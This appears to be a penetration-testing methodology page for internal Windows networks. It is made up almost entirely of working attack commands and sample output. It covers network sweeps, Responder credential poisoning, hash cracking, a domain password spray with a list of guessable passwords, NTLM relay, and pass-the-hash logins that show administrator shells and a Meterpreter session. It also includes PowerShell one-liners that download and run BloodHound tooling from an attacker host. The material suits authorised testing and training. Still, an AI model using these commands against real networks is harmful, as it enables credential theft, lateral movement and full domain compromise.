Internal Network

Host Discovery
Nmap Ping Scan Private Ranges and start responder
responder -i eth0
​
nmap -sn -n 10.0.0.0/8 | tee -a Targets.tmp
nmap -sn -n 172.16.0.0/12 | tee -a Targets.tmp 
nmap -sn -n 192.168.0.0/16 | tee -a Targets.tmp
​
# Loud so only use if required
masscan 10.0.0.0/8 -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 172.16.0.0/12  -p80,445,22 --rate 100000000 | tee -a Targets.tmp
masscan 192.168.0.0/16  -p80,445,22 --rate 100000000 | tee -a Targets.tmp
​
#Note down IP addresses from responder
responder -I eth0
cat /usr/share/responder/logs/Responder-Session.log | grep answer | awk '{print $11}' | sort -u | tee -a Targets.tmp
​
#Note current IP address & scan range
ifconfig
nmap --top-ports 10 10.0.0.1/24 -Pn | tee -a Targets.tmp
​
#netdiscover
netdiscover -i eth0 -P
​
#NBTScan
nbtscan 192.168.1.0/24
Now cat grep and sort the IP addresses into a file called Targets.txt
Nmap Scans
mkdir Scans
nmap -p 21 -n --open -iL targets -oA Scans/ftp
nmap -p 22 -n --open -iL targets -oA Scans/ssh
nmap -p 23 -n --open -iL targets -oA Scans/telnet
nmap -p 80 -n --open -iL targets -oA Scans/http
nmap -p 443 -n --open -iL targets -oA Scans/https
nmap -p 445 -n --open -iL targets -oA Scans/smb
nmap -p 3389 -n --open -iL targets -oA Scans/rdp
​
cat Scans/ftp.nmap | grep for | cut -d " " -f 5 > ftphosts.txt
cat Scans/ssh.nmap | grep for | cut -d " " -f 5 > sshhosts.txt
cat Scans/telnet.nmap | grep for | cut -d " " -f 5 > telnethosts.txt
cat Scans/http.nmap | grep for | cut -d " " -f 5 > httphosts.txt
cat Scans/https.nmap | grep for | cut -d " " -f 5 > httpshosts.txt
cat Scans/smb.nmap | grep for | cut -d " " -f 5 > smbhosts.txt
cat Scans/rdp.nmap | grep for | cut -d " " -f 5 > rdphosts.txt
Scanning
Start Nessus on discovered IP addresses 
Run AutoScan.sh against all Targets.txt
Modify if running slowly (thousands of hosts) and reduce the amount of ports it is looking at.
#!/bin/bash
for Target in $(cat Targets.txt)
do
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "Auto Scanner"  | tee -a Scanner.log
echo "$Target - Scanned: $(date)" | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
echo ""  | tee -a Scanner.log
echo "---------------------------------------------------------------" | tee -a Scanner.log
echo "TCP Scan Started: $(date)"  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
#Full
nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target  | tee -a Scanner.log
#Fast
#nmap -Pn -sSVC -O --top-ports 1000 -oN $Target-01-NmapTCP.txt $Target  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
echo "UDP Scan Started: $(date)"  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
#Full
#nmap -sUV -sC --top-ports 200 -oN $Target-02-NmapUDP.txt $Target  | tee -a Scanner.log
#Fast
nmap -sUV -sC --top-ports 10 -oN $Target-02-NmapUDP.txt $Target  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
echo "Nikto Scan Started: $(date)"  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
nikto -p 80,443,8000,8080 -h $Target | tee $Target-03-Nikto.txt  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
echo "SSL Scan Started: $(date)"  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
sslscan --show-certificate --no-colour $Target | tee $Target-04-SSLScan.txt  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
echo "Directory Scan Started: $(date)"  | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
gobuster -u http://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt  | tee -a Scanner.log
gobuster -k -u https://$Target/ -w /root/Data/Tools/Wordlists/Dirbuster/Fast.txt -q -e -t 10 | tee -a $Target-05-Directories.txt  | tee -a Scanner.log
done
for Target in $(cat Targets.txt)
do
cat $Target-01-NmapTCP.txt | grep /tcp | grep open >> "$Target"_Ports.txt 2> /dev/null
cat $Target-02-NmapUDP.txt | grep /udp | grep open | grep -v filtered >> "$Target"_Ports.txt 2> /dev/null
(
input="$Target"_Ports.txt      
while IFS= read -r port
do     
echo "$Target":"$port" >> ServicesList.txt
done <         "$Target"_Ports.txt
)
rm *_Ports.txt
done
echo
echo "---------------------------------------------------------------"  | tee -a Scanner.log
echo "The following services were found:" | tee -a Scanner.log
echo "---------------------------------------------------------------"  | tee -a Scanner.log
cat ServicesList.txt | tee -a Scanner.log
done
Check responder for hashes and crack with hashcat
hashcat --force -m 5600 Hashes.txt /path/to/wordlist -r /path/to/rules
Once you have some hashes test with several wordlists, if none work then scrape the clients website for words with cewl
cewl -w clientwordlist.txt -d 5 -m 8 https://www.clientsite.com/
Then repeat the cracking process with a good rule list.
Domain enumeration
Get DC List
# Windows command
nltest /DCLIST:domain.local
​
# Linux Commands
cat /etc/resolv.conf
​
nmap -p 88,389,636 -iL Targets.txt --open
​
for i in (cat Targets.txt); do nslookup $i | grep "dc"; done 
​
nslookup 
> set type=all
_ldap._tcp.dc._msdcs.DOMAIN
Get user list
rpcclient -U "domain\\username" 10.0.0.1 (DC)
rpcclient $> enumdomusers
Copy list of users to "rpcuserlist.txt" file and sort:
cat rpcuserlist.txt | cut -d "[" -f 2 | cut -d "]" -f 1 | sort -u > DomainUsers.txt
Password spray domain users 
Set a timer for every 30 minutes and rerun this attack.
May be worth checking the password lockout policy with the client if in a sensitive environment.
msfconsole -q
set rhosts domaincontrollerip
use auxiliary/scanner/smb/smb_login
set SMBDomain domain
set USER_FILE DomainUsers.txt
set SMBPass firstpassword
date << adds a timestamp
run
When time is up change the password and rerun.
Passwords to try:
Clientname2019
Location2019
Password12345!
Summer2019!
Spring2019!
Summer2018!
Password2018!
Welcome2018!
Password 2018!
Summer@2018
Find open file servers 
SMB Map
Find open SMB shares which are available unauthenticated
for i in $(cat 00-Targets.txt);do smbmap -H $i; done | tee -a SMBMap-Output.txt
Find open writable shares and search for authenticated file servers:
for i in $(cat Targets.txt);do smbmap -u 'username' -p 'password' -d 'domain' -H $i; done | tee -a SMBMap-Output.txt
leafpad SMBMap-Output.txt 
ctrl + f WRITE (Search for writable folders)
EyeWitness
python /root/Data/Tools/EyeWitness/EyeWitness.py --all-protocols -x NmapTCP.xml
NTLM Relay
Modify Responder.conf to turn off HTTP and SMB
[Responder Core]
​
; Servers to start
SQL = On
SMB = Off << turn off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off << turn off
HTTPS = On
DNS = On
LDAP = On
Start responder
python Responder.py -I <interface> -r -d -w
responder -I <interface> -r -d -w
Create a list of targets with SMB signing disabled.
nmap -n -p 137,139,445 --script=smb-security-mode 192.168.1.0/24 | grep disabled -B 15 | grep for | cut -d " " -f 5 | tee -a smbsigningdisabled.txt 
Now start ntlmrelayx.py against the targets
python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf smbsigningdisabled.txt
If you capture a high priv users account it will drop the hashes from the system
Now use psexec within metasploit to login to the target
msfconsole
use exploit/windows/smb/psexec
set lhost 192.168.1.1
set rhost 192.168.1.11
set smbpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit
Pass the hash
Either will do, once the enumeration has finished upload the csv files to your attacker machine.
Then run 
python ntlmrelayx.py -tf smbsigningdisabled.txt
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
# Where WORKGROUP is the default WORKGROUP. Can be replaced by a domain name
# Administrator: account's name
# aad3b435b51404eeaad3b435b51404ee: Empty LM HASH
# C0F2E311D3F450A7FF2571BB59FBEDE5: NTLM hash 
root@Kali:~# pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows \[Version 6.3.9600\]
(c) 2013 Microsoft Corporation. All rights reserved.
​
C:\Windows\system32>whoami
Server\Administrator
root@Kali:~# pth-wmic -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "select Name from Win32_UserAccount"
root@Kali:~# pth-wims -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25 "cmd.exe /c whoami > c:\temp\result.txt"
root@Kali:~# pth-smbclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25/c$
root@Kali:~# pth-rpcclient -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 //192.168.1.25
root@Kali:~# wmiexec.py  -hashes aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 administrator@192.168.1.25
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies
​
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
root@Kali:~# apt-get update
root@Kali:~# apt-get install freerdp-x11
root@Kali:~# xfreerpd /u:richard /d:workgroup /pth:C0F2E311D3F450A7FF2571BB59FBEDE5 /v:192.168.1.25
msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set SMBPass aad3b435b51404eeaad3b435b51404ee:C0F2E311D3F450A7FF2571BB59FBEDE5 
msf exploit(psexec) > set SMBUser Administrator 
msf exploit(psexec) > set SMBDomain WORKGROUP
msf exploit(psexec) > run
[*] Started reverse TCP handler on 192.168.1.24:4444 
[*] 192.168.1.25:445 - Connecting to the server...
[*] 192.168.1.25:445 - Authenticating to 192.168.1.25:445|WORKGROUP as user 'administrator'...
[*] 192.168.1.25:445 - Selecting PowerShell target
[*] 192.168.1.25:445 - Executing the payload...
[+] 192.168.1.25:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.24:4444 -> 192.168.1.25:49173) at 2017-04-05 22:48:15 +0200
​
meterpreter > exit
This will output the local hashes if you capture a domain admins NTLM hash.
Once you have this hash, login to the machine with metasploits psexec pass the hash or psexec.py
Bloodhound
Once on the domain as a windows user run the following:
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/BloodHound.ps1')"
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://attackerip/SharpHound.exe')"
Once on your attacker machine make sure you have bloodhound installed and then execute:
neoj4 console
bloodhound
Visit 127.0.0.1:7687
Enter your password and upload the csv files you extracted from the target.
Click queries and then find shortest path to domain admin
​
Methodologies - Previous
Buffer Overflow
Next - Methodologies
Mobile Testing
Last updated -2